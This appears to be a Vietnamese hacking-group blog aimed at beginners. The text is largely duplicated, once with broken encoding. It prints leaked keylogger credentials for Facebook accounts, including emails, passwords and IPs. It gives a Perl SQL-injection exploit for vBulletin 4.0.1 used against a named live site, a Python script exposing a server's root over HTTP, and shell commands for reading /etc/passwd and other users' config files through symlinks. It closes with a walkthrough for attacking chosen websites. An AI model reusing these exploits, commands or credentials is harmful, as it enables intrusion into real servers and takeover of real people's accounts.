Chủ Nhật, 24 tháng 5, 2015
T?m password t? c�c con keylog tr�n th? gi?i
newbie area vhb vhbV�o trang http://pastebin.com/
t?m khung search bar v� nh?p v�o
ho?c
t�y c�i c?n t?m m� nh?p nh�
v? d? v?i Program:firefox Url/Host:http://www.facebook.com login
ta nh?n �c l�
Ch?n v�o 1 link ta check th? �c
t?t nhi�n pass c� th? �? b? �?i,h�n xui th�i =))
ta th�y c� th? t?m h�ng ng�n account �? b? keylog b?t :))
Capuchino - VHB Group
t?m khung search bar v� nh?p v�o
Program:firefox Url/Host:http://www.facebook.com login
ho?c
Program:firefox Url/Host:http://www.yahoo.com login
t�y c�i c?n t?m m� nh?p nh�
v? d? v?i Program:firefox Url/Host:http://www.facebook.com login
ta nh?n �c l�
Ch?n v�o 1 link ta check th? �c
Program: Firefox
Url/Host: http://www.facebook.com
Login: eleazarberrios@hotamail.com
Password: eleazarberrios
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:12
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: http://hacking-facebook.com
Login: ele1234
Password: eleazarberriosw
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:17
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: eleazarberrios@hotmail.com
Password: eleazarberrios
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:18
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: https://login.facebook.com
Login: eleazarberrios@hotmail.com
Password: eleazarberrios
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:19
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: http://es-es.facebook.com
Login: elitag12@hotmail.com
Password: misbebes
Computer: LENOVO
Date: 2010-12-31 00:06:19
Ip: 190.22.122.185
----------------------------------------------------------
Program: Firefox
Url/Host: http://es-es.facebook.com
Login: carlitag12kids@hotmail.com
Password: carlitalaxora39
Computer: LENOVO
Date: 2010-12-31 00:06:19
Ip: 190.22.122.185
----------------------------------------------------------
t?t nhi�n pass c� th? �? b? �?i,h�n xui th�i =))
ta th�y c� th? t?m h�ng ng�n account �? b? keylog b?t :))
Capuchino - VHB Group
Tìm password từ các con keylog trên thế giới
newbie area vhb vhbVào trang http://pastebin.com/
tìm khung search bar và nhập vào
hoặc
tùy cái cần tìm mà nhập nhá
vì dụ với Program:firefox Url/Host:http://www.facebook.com login
ta nhận đc là
Chọn vào 1 link ta check thử đc
tất nhiên pass có thể đã bị đổi,hên xui thôi =))
ta tháy có thể tìm hàng ngàn account đã bị keylog bắt :))
Capuchino - VHB Group
tìm khung search bar và nhập vào
Program:firefox Url/Host:http://www.facebook.com login
hoặc
Program:firefox Url/Host:http://www.yahoo.com login
tùy cái cần tìm mà nhập nhá
vì dụ với Program:firefox Url/Host:http://www.facebook.com login
ta nhận đc là
Chọn vào 1 link ta check thử đc
Program: Firefox
Url/Host: http://www.facebook.com
Login: eleazarberrios@hotamail.com
Password: eleazarberrios
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:12
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: http://hacking-facebook.com
Login: ele1234
Password: eleazarberriosw
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:17
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: http://www.facebook.com
Login: eleazarberrios@hotmail.com
Password: eleazarberrios
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:18
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: https://login.facebook.com
Login: eleazarberrios@hotmail.com
Password: eleazarberrios
Computer: PC-3F2D90D21838
Date: 2010-12-30 23:51:19
Ip: 200.82.253.174
----------------------------------------------------------
Program: Firefox
Url/Host: http://es-es.facebook.com
Login: elitag12@hotmail.com
Password: misbebes
Computer: LENOVO
Date: 2010-12-31 00:06:19
Ip: 190.22.122.185
----------------------------------------------------------
Program: Firefox
Url/Host: http://es-es.facebook.com
Login: carlitag12kids@hotmail.com
Password: carlitalaxora39
Computer: LENOVO
Date: 2010-12-31 00:06:19
Ip: 190.22.122.185
----------------------------------------------------------
tất nhiên pass có thể đã bị đổi,hên xui thôi =))
ta tháy có thể tìm hàng ngàn account đã bị keylog bắt :))
Capuchino - VHB Group
Sym root bypass open port n?u server cho ch?y python
newbie area vhb vhb�?u ti�n m?i ng�?i c� th? ki?m tra xem c� g�i python �c c�i tr�n server ch�a
d�ng l?nh python -h xem c� tr? v? k?t qu? g? ko n�.
N?u c� ch?y th? t?o �o?n code python sau l�u v�o file capuchino.py
Sau �� ch?y n� python capuchino.py
r?i ki?m tra k?t qu? :victim:7777
C�ch n�y c� th? gi?u �c k?t qu? th?c hi?n sym tr�n server
Capuchino - VHB Group
d�ng l?nh python -h xem c� tr? v? k?t qu? g? ko n�.
N?u c� ch?y th? t?o �o?n code python sau l�u v�o file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()
Sau �� ch?y n� python capuchino.py
r?i ki?m tra k?t qu? :victim:7777
C�ch n�y c� th? gi?u �c k?t qu? th?c hi?n sym tr�n server
Capuchino - VHB Group
Sym root bypass open port nếu server cho chạy python
newbie area vhb vhbĐầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
Sau đó chạy nó python capuchino.py
rồi kiểm tra kết quả :victim:7777
Cách này có thể giấu đc kết quả thực hiện sym trên server
Capuchino - VHB Group
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()
Sau đó chạy nó python capuchino.py
rồi kiểm tra kết quả :victim:7777
Cách này có thể giấu đc kết quả thực hiện sym trên server
Capuchino - VHB Group
Video T?ng h?p v? botnet
newbie area vhb vhb��y l� nh?ng video m?nh s�u t?m t? nhi?u ngu?n!!
http://www.mediafire.com/download.php?qqtc0ad59vqrrji
http://www.mediafire.com/download.php?l6imrwffsnwq75r
changyun - VHB Group
http://www.mediafire.com/download.php?qqtc0ad59vqrrji
http://www.mediafire.com/download.php?l6imrwffsnwq75r
changyun - VHB Group
Video Tổng hợp về botnet
newbie area vhb vhbĐây là những video mình sưu tầm từ nhiều nguồn!!
http://www.mediafire.com/download.php?qqtc0ad59vqrrji
http://www.mediafire.com/download.php?l6imrwffsnwq75r
changyun - VHB Group
http://www.mediafire.com/download.php?qqtc0ad59vqrrji
http://www.mediafire.com/download.php?l6imrwffsnwq75r
changyun - VHB Group
Exploit vbb 4.0.x b?ng perl cho newbie
newbie area vhb vhbh?y perl xong
T?o file perl v?i n?i dung
L�u v� d? nh� capuchino.pl hihi
T?m 1 site vbb 4.0.x
M?nh v� d? ? ��y l� http://www.flashyworld.com/vb/index.php
m? cmd l�n,v�o th� m?c l�u file capuchino.pl
ch?y capuchino.pl flashyworld.com /vb/ 1
c?u tr�c ? ��y l� file.pl site.com /folderforum/ userid
userid admin th? th�?ng l� 1
sau khi ch?y th? ta th?y
Pass nh?n �c l� : e714ad492ee5e2d84bca13c17fd6464a v�o b?ng cookie th�i
dork t?m victim :"Powered by vBulletin� Version 4.0.1"
bonus th�m 1 victim c?n khai th�c �c
Capuchino - VHB Group
T?o file perl v?i n?i dung
#!/usr/bin/perl
use IO::Socket;
print q{
#######################################################################
# vBulletin? Version 4.0.1 Remote SQL Injection Exploit #
# By th3.g4m3_0v3r #
# our Site www.h4ck3r.in #
# www.hackingcrackingtricks.blogspot.com #
# Indian (th3.g4m3_0v3r@yahoo.com) #
# Dork: Powered by vBulletin? Version 4.0.1 #
#######################################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid
perl VB4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ? ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
L�u v� d? nh� capuchino.pl hihi
T?m 1 site vbb 4.0.x
M?nh v� d? ? ��y l� http://www.flashyworld.com/vb/index.php
m? cmd l�n,v�o th� m?c l�u file capuchino.pl
ch?y capuchino.pl flashyworld.com /vb/ 1
c?u tr�c ? ��y l� file.pl site.com /folderforum/ userid
userid admin th? th�?ng l� 1
sau khi ch?y th? ta th?y
Pass nh?n �c l� : e714ad492ee5e2d84bca13c17fd6464a v�o b?ng cookie th�i
dork t?m victim :"Powered by vBulletin� Version 4.0.1"
bonus th�m 1 victim c?n khai th�c �c
Capuchino - VHB Group
Exploit vbb 4.0.x bằng perl cho newbie
newbie area vhb vhbhạy perl xong
Tạo file perl với nội dung
Lưu ví dụ như capuchino.pl hihi
Tìm 1 site vbb 4.0.x
Mình ví dụ ở đây là http://www.flashyworld.com/vb/index.php
mở cmd lên,vào thư mục lưu file capuchino.pl
chạy capuchino.pl flashyworld.com /vb/ 1
cấu trúc ở đây là file.pl site.com /folderforum/ userid
userid admin thì thường là 1
sau khi chạy thì ta thấy
Pass nhận đc là : e714ad492ee5e2d84bca13c17fd6464a vào bằng cookie thôi
dork tìm victim :"Powered by vBulletin® Version 4.0.1"
bonus thêm 1 victim còn khai thác đc
Capuchino - VHB Group
Tạo file perl với nội dung
#!/usr/bin/perl
use IO::Socket;
print q{
#######################################################################
# vBulletin? Version 4.0.1 Remote SQL Injection Exploit #
# By th3.g4m3_0v3r #
# our Site www.h4ck3r.in #
# www.hackingcrackingtricks.blogspot.com #
# Indian (th3.g4m3_0v3r@yahoo.com) #
# Dork: Powered by vBulletin? Version 4.0.1 #
#######################################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid
perl VB4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ? ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
Lưu ví dụ như capuchino.pl hihi
Tìm 1 site vbb 4.0.x
Mình ví dụ ở đây là http://www.flashyworld.com/vb/index.php
mở cmd lên,vào thư mục lưu file capuchino.pl
chạy capuchino.pl flashyworld.com /vb/ 1
cấu trúc ở đây là file.pl site.com /folderforum/ userid
userid admin thì thường là 1
sau khi chạy thì ta thấy
Pass nhận đc là : e714ad492ee5e2d84bca13c17fd6464a vào bằng cookie thôi
dork tìm victim :"Powered by vBulletin® Version 4.0.1"
bonus thêm 1 victim còn khai thác đc
Capuchino - VHB Group
Thứ Bảy, 23 tháng 5, 2015
Check sqlinjection vbulletin mod chang stats
newbie area vhb vhbCheck sqlinjection vbulletin mod chang stats
http://www.mediafire.com/download/rsbbczaf00abqtf/sql+vhb+chang+stats.rar
Capuchino - VHB Group
http://www.mediafire.com/download/rsbbczaf00abqtf/sql+vhb+chang+stats.rar
Capuchino - VHB Group
T?ng h?p nh?ng l?nh shell hay d�ng khi local
newbie area vhb vhb1) Xem list domain & user tr�n c�ng sever
cd/etc/vdomainaliases;ls-lia
Tr�?ng h?p �?c bi?t khi kh�ng th? xem user n?m c�ng host th? ta th�m && v�o
2)Xem t�n user: t�y v�o distro linux kh�c nhau s? c� c�c c�u l?nh �?c file kh�c nhau.
3)Local sang victim b?ng l?nh dir ( 2013 - gi? hi?m server n�o c?n s�i ��?c)
vd: dir /home/vhb/public_html
4)Xem n?i dung file l?nh xem file c?ng t��ng t? nh� m?c s? 2
-> c� th? s�i c�c l?nh �� thay th? cho cat, less,...
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: t�c d?ng g?n gi?ng nh� t?o shorcut tr�n windows.
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
v?i file 1.txt hay 1.ini l� m?nh t? �?t �? n� t?o li�n k?t t? file config.php �?n.
6) T?m path c?a m?y victim s�i Add on domain
----------------------------------------------
concobe - VHB Group
directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com
cd/etc/vdomainaliases;ls-lia
Tr�?ng h?p �?c bi?t khi kh�ng th? xem user n?m c�ng host th? ta th�m && v�o
cd/etc/vdomainaliases && ls-lia
2)Xem t�n user: t�y v�o distro linux kh�c nhau s? c� c�c c�u l?nh �?c file kh�c nhau.
cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd
rev /etc/passwd
xxd /etc/passwd
3)Local sang victim b?ng l?nh dir ( 2013 - gi? hi?m server n�o c?n s�i ��?c)
dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html
4)Xem n?i dung file l?nh xem file c?ng t��ng t? nh� m?c s? 2
-> c� th? s�i c�c l?nh �� thay th? cho cat, less,...
cat/home/ten user can local/public_html/index.php
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: t�c d?ng g?n gi?ng nh� t?o shorcut tr�n windows.
ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
v?i file 1.txt hay 1.ini l� m?nh t? �?t �? n� t?o li�n k?t t? file config.php �?n.
6) T?m path c?a m?y victim s�i Add on domain
find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
----------------------------------------------
concobe - VHB Group
Tổng hợp những lệnh shell hay dùng khi local
newbie area vhb vhb1) Xem list domain & user trên cùng sever
cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào
2)Xem tên user: tùy vào distro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.
3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)
vd: dir /home/vhb/public_html
4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2
-> có thể sài các lệnh đó thay thế cho cat, less,...
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: tác dụng gần giống như tạo shorcut trên windows.
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.
6) Tìm path của mấy victim sài Add on domain
----------------------------------------------
concobe - VHB Group
directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com
cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào
cd/etc/vdomainaliases && ls-lia
2)Xem tên user: tùy vào distro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.
cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd
rev /etc/passwd
xxd /etc/passwd
3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)
dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html
4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2
-> có thể sài các lệnh đó thay thế cho cat, less,...
cat/home/ten user can local/public_html/index.php
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: tác dụng gần giống như tạo shorcut trên windows.
ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.
6) Tìm path của mấy victim sài Add on domain
find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'
----------------------------------------------
concobe - VHB Group
T� duy - Ph��ng h�?ng Attack Website - Server
newbie area vhb vhbT?nh h?nh l� c� kh� nhi?u b?n pm m?nh h?i c�ch check site.M� M?nh c?ng kh�ng c� nhi?u th?i gian �? ch? t?ng b?n.N�n m?nh vi?t c�i ��?ng �i.T� duy check site �? c�c b?n �?c.T? �� c� m?t c�i �?nh h�?ng.T? m?nh nghi�n c?u.Th?c hi?n.
�i?u �?u ti�n m?nh mu?n n�i �� l� mu?n t?n c�ng 1 site.�i?u �?u ti�n b?n c?n c� �?y l� s? ki�n nh?n.C�p nh?t t?ng t� m?t.Kh�ng th? n�n n�ng m� b? qua nhi?u th�ng tin.D?n �?n gi?m hi?u qu?.Kh�ng ph?i website n�o t?n c�ng 1 ph�t c?ng l� ��?c ngay.Ch�nh v? th? n�n ph?i t�ch t?ng �i th�ng tin m?t.
N?u �? ki?m m?t site �? check ch�i th? t?t nh?t l� c�c b?n n�n d�ng c�c dork t?m c�c site c� l?i s?n.V� d? nh� c�c dork sqli .C�c dork c?a c�c phi�n b?n joomla ,vbulletin c� l?i.Nh� v?y s? hi?u qu? h�n l� t?m 1 site b?t k? r?i xem th? n� c� l?i kh�ng. (Ngo�i ra c?n c� m?t c�ch nhanh h�n n?a �� l� d�ng tool scan dork.N� s? t?m cho b?n m?t kh?i site b? l?i c� th? check ��?c t? m?t list dork c� s?n.C�i n�y hi?u qu? h�n cho d�n UG l�c t?m shop l?i.)
C?n n?u b?n mu?n t?n c�ng m?t website x�c �?nh.Th? vi?c n�y kh� h�n.Gi? s? victim c?a b?n c� domain l� target.com .�? t?n c�ng victim m?t c�ch hi?u qu?.(M?nh n�i ? ��y l� c? �?i v?i host share v� private.Site l?n c� b?o m?t t?t,l?n site nh?,forum. ) .
B�?c 1: L?y th�ng tin ban �?u.
L?y th�ng tin c?a victim .B?ng c�c whois n�.T?m hi?u c�ng nhi?u th�ng tin v? victim c�ng t?t.V� google ,bing ,yandex .... �?u l� c�c c�ng c? h?u �ch.M?nh khuy�n n�n th? v?i nhi?u c�ng c? t?m ki?m.V? b?n th�n thu?t to�n t?m ki?m c?a c�c c�ng c? n�y kh�c nhau n�n d?n �?n cho nhi?u k?t qu? v?i hi?u qu? kh�c nhau.
V� d? nh� nh?p v�o c�ng c? search nh� sau
N� s? cho ta m?t s? th�ng tin th� v?.B?n h?y c? g?ng thu th?p th�ng tin ban �?u c�ng nhi?u c�ng t?t.Ch? s? h?u domain.Admin c?a website.Support.K? c? s? �i?n tho?i , facebook,gmail ,yahoo, �?a ch? mail c?a c�ng ty.1 Attacker gi?i l� m?t attacker c� kh? n�ng t?n d?ng m?i s� h?.M?i �i?m y?u c� th? t?n c�ng.
B�?c 2 : Ph�n t�ch kh? n�ng t?n c�ng.
�?u ti�n l� n�n scan victim ch�nh.Scan victim ch�nh l� c�ng vi?c ch? �?o.�?i v?i site n?m trong server private c?a c�c c�ng ty l?n.Th? ��y l� b�?c ��ng vai tr? quy?t �?nh b?n c� th? attack ��?c n� hay kh�ng.
C�ng c? scan kh� nhi?u.M?nh gi?i thi?u b?n 1 s? b? nh� acunetix Vulnerablility Scanner . OpenVas (c?a backtrack ) , w3af ( c?a backtrack ) , nessus (c?a backtrack ), wpscan ( scan wordpress trong backtrack ) , joomlascan ( scan bug joomla trong backtrack , uniscan ( trong backtrack ) ... ng?i m� k? h?t c�c b? c�ng c? ch?c �?n s�ng mai.C�ng c? th? nhi?u nh�ng c�c b?n n�n ch?n l?a.�?i v?i victim n�o n�n d�ng b? n�o.V� n�n d�ng k?t h?p.V? nh� m?nh �? n�i.V?i m?i tool kh�c nhau n� d�ng c� ch? ,thu?t to�n scan kh�c nhau.N�n hi?u qu? n� c?ng kh�c nhau.T? k?t qu? scan ��?c.N� cho ta �?nh h?nh ph?i t?n c�ng nh� th? n�o.
Scan server.Scan l?y th�ng tin v? server.V� d? nh� xem server d�ng h? �i?u h�nh g?.S? d?ng Apache ,SII phi�n b?n bao nhi�u. ��?c vi?t tr�n ASP hay PHP .Port n�o m?.(�? scan port th? c� th? d�ng nmap.N� l� c�ng c? r?t hi?u qu?).
M?i th�ng tin v? phi�n b?n,port b?n h?y google ngay.Ho?c v�o exploit-db.com xem n� c� th? b? attack th�ng qua n� hay kh�ng.C?n kh�ng b?n c� th? l�u l?i th�ng tin.R?i sau �� ki?m tra 1 l?n xem sao.��y l� c�c b�?c r?t c?n thi?t �?i v?i vi?c t?n c�ng 1 website l?n.
�?i v?i Server share host.Ph�n t�ch kh? n�ng t?n c�ng .��y c?ng l� m?t b�?c r?t quan tr?ng.N� r�t ng?n th?i gian t?n c�ng c?a b?n.Nh�ng mang l?i hi?u qu? cao.
M?nh th?y �a s? (V� tr�?c ��y m?nh c?ng v?y ). �� l� �? t?n c�ng 1 website ko b? l?i ,Kh�ng c� l? h?ng.M?nh th�?ng reserve ip c?a server ch?a victim.R?i m? t?ng site check xem c� sqli hay kh�ng.
�?ng ? l� sqli r?t nhi?u.V� r?t d? khai th�c.Nh�ng kh�ng ph?i l�c n�o m?nh c?ng c� th? may m?n.Check 1 c�i l� ra link b? l?i ngay.N?u scan to�n b? site th? �?n bao gi? m?i xong.C� m?t c�ch r�t ng?n qu� tr?nh n�y �� l� x�c �?nh lo?i site c?n t?n c�ng.
M?nh v� d?.B?n c� kinh nghi?m v? check wordpress.B?n mu?n t?m c�c site trong server s? d�ng m? ngu?n n�y �? t?n c�ng.Sau �� local sang victim ch�nh.H?y d�ng google v?i dork l�
ip:112.78.2.247 "wordpress"
Nh� ��y m?nh nh?n ��?c m?t victim trong server n�y s? d?ng wordpresss http://www.saigoncanho.com.vn/
T��ng t? cho c�c m? ngu?n kh�c c?ng v?y.
B�?c 3: T?n c�ng.
��y l� b�?c nhi?u nh?t,Nh�ng m?nh n�i �t nh?t,v� n� c� qu� nhi?u ki?u t?n c�ng.Bi?t n�i th? n�o cho h?t ��?c.
Ch? ��c k?t m?t s? kinh nghi?m.V� d? nh� �?i v?i forum vbb ch?ng h?n.Nhi?u phi�n b?n th?c s? kh�ng c� bug.Nh�ng kh�ng ph?i v? th? m� ta b? qua.H?y xem c�c web application c?a n�.V� d? nh� c�c mod.�?i v?i joomla v� c�c m? ngu?n kh�c c?ng v?y.H?y xem c�ch extension �i theo.Ch�ng r?t hay b? l?i.B?i v? ��y �a s? l� c�c ?ng d?ng t�ch h?p ��?c vi?t b?i c�c web developer vi?t nam.Ch�ng r?t k�m trong vi?c b?o m?t.
T?n d?ng t?i �a k?t qu? m� c�c b?n scan ? tr�n.V� d? nh� b?n scan ��?c server d�ng apache 2.1 ch?ng h?n.H?y xem n� l� b?n update ch�a.N?u ch�a c� l?i �? khai th�c kh�ng.T?n c�ng v�o n�.Xem th�ng tin t? c�c l?i public tr�n google m� t?n c�ng.H?y c? g?ng t?n c�ng 1 c�ch t? t?.
Xem trong c?u tr�c site khi scan ��?c .Ch? n�o l� khai th�c ��?c.V� d? nh� ch�ng �? l?i database back up tr�n site ch?ng h?n.T?i v? v� ph�n t�ch ngay.
Nhi?u b? c�ng c? scan n� scan �?n t?ng l?i nh?.Nh� t?m v? tr� c� th? up ?nh, up file b?ng h?n.H?y c? bypass up shell th? xem.
? m?c n�y c� qu� nhi?u c�i �? n�i.V� th?c ch?t �a s? m?i tut hack th�?ng n�i v? ph?n n�y.N�n m?nh �? ph?n n�y cho c�c b?n.H?y c? g?ng t�ch h?p c�ng nhi?u kinh nghi?m ph?n n�y .C�ng nhi?u c�ng t?t.C�c ph?n kh�c n� �i theo 1 qui lu?t nh?t �?nh.C� th? �?i v?i victim n�o b?n c?ng l�m nh� th?.Nh�ng �?i v?i ph?n n�y.N� ph? thu?c v�o nhi?u th?.Ph? thu?c v�o k?t qu? scan ��?c.Ph? thu?c v�o nh?ng �?i t�?ng kh�c nhau.N�n n� r?t �a d?ng.
K?t qu? ? ph?n n�y.L� b?n c� th? c� ��?c t�i kho?n admin.Up ��?c shell.
B�?c 4: N?u t?n c�ng ��?c tr?c ti?p target r?i th? kh�ng n�i l�m g?.N?u t?n c�ng �c m?t site n?m c�ng server.Th? b�?c ti?p theo l� local.V? v?n �? local n�y c?ng kh� r?ng.M?nh ch? n�i qua m?t ph?n trong ��.
Trong local th? symlink l� m?t ki?u local ph? bi?n nh?t ,��?c d�ng nhi?u nh?t.N� nh� l� m?t shortcut b�n window.G�p ph?n l�m nhanh qu� tr?nh g?i ch?y m?t file.N?u nh� g?i tr?c ti?p hardlink th? qu� tr?nh h?at �?ng c?a server s? ch?m h?ng.
Trong ph��ng ph�p local.M?c ��ch ch�nh c?a ch�ng ta l� �?c / l?y c�c file config (ho?c 1 file config c?a target c?n t?n c�ng ). Vi?c th?c hi?n �?u ti�n l� ch�ng ta th�?ng �?c file /etc/passwd �? x�c �?nh t?t c? c�c user n?m trong server ( V� kh�ng ph?i server n�o c?ng cho ta th?c hi?n �c.Ph?i bypass ).
�? �?c file config ta c?n ph?i n?m c�c m? ngu?n.V?i m?i m? ngu?n kh�c nhau th? file config n� n?m ? m?t v? tr� kh�c nhau.
M?nh ��a ra m?t s? file config �?i v?i m?t s? m? ngu?n t��ng ?ng.
T? ��y ta h?nh dung ��?c ��?ng d?n ch�nh x�c d?n �?n file config c?a victim.T? �� c� th? symlink ��?c ch�nh x�c file c?n �?c. (N?u nh� victim �?i v? tr� c?a file config.Th? ta ph?i ng?i symlink m?.Symlink t? index n�,�?n nh?ng file kh�c,xem n� include nh?ng file n�o .T? file n�y d? �?n file kia.�?i v?i m?t attacker kinh nghi?m.Th? vi?c b?o m?t b?ng c�ch gi?u file config c?a victim ��i khi kh�ng hi?u qu?.
C?u tr�c l?nh symlink (�? symlink file c� �?a ch? l� /home/usertarget/public_html/includes/config.php target.txt
l?nh n�y symlink file config v? file target.txt n?m ? th� m?c ta �ang symlink. ? �i?u ki?n t?t nh?t ta c� th? �?c �c file target.txt n�y tr�n host ta �?t shell.
Nh�ng kh�ng ph?i khi n�o ta c?ng c� �i?u ki?n t?t nh� v?y. Ch? c?a website c� th? chmod kh�ng cho ta �?c file config (100,101,400... ) ch?ng han.T�y server.Ho?c ch? website �?t t?i th� m?c ch?a file config �?y 1 file .htaccess c� n?i dung nh� sau.
N?u ch? site �?c nh� th? th? khi symlink ta s? nh?n ��?c th�ng b�o l� 403 Forbidden Error.
? b�i n�y m?nh ch? n�i �?n t� t�?ng t?n c�ng ch? kh�ng n�i chi ti?t v? ph��ng ph�p t?n c�ng.N�n m?nh ch? n�u 1 v�i v� d?.
